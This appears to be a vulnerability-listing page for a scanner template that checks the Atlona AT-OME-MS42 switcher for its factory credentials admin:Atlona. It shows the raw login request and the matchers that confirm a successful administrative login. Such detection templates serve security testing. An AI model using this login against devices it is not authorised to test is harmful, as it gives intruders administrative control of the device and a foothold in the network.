atlona-default-login: Atlona AT-OME-MS42 - Default Login

日期: 2025-08-01 | 影响软件: Atlona AT-OME-MS42 | POC: 已公开

漏洞描述

The Atlona AT-OME-MS42, a 4x2 matrix switcher supporting HDMI, USB-C, and DisplayPort inputs, is accessible via a built-in web management interface. By default, this interface uses the factory-set credentials admin:Atlona. If left unchanged, attackers could gain unauthorized administrative access to the device, potentially allowing them to alter configurations, disrupt AV switching, or pivot further into the network.

PoC代码[已公开]

id: atlona-default-login

info:
  name: Atlona AT-OME-MS42 - Default Login
  author: matejsmycka
  severity: high
  description: |
    The Atlona AT-OME-MS42, a 4x2 matrix switcher supporting HDMI, USB-C, and DisplayPort inputs, is accessible via a built-in web management interface. By default, this interface uses the factory-set credentials admin:Atlona. If left unchanged, attackers could gain unauthorized administrative access to the device, potentially allowing them to alter configurations, disrupt AV switching, or pivot further into the network.
  reference:
    - https://atlona.com/pdf/manuals/AT-OME-MS42_G.pdf
  tags: atlona,default-login,vuln

http:
  - raw:
      - |
        POST /cgi-bin/login.cgi?ssid={{base64('admin:Atlona')}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic undefined
        X-Requested-With: XMLHttpRequest
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/json
        Cookie: SSID=

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Login Success!")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207774350e044effdc5816f9882560b1d206d215ea4660d75ebe52b30d722a1ed3022100e551735669e5ad302c4d563b5147f033141393f2f327b92e6a3071f980e175ee:922c64590222798bb761d5b6d8e72950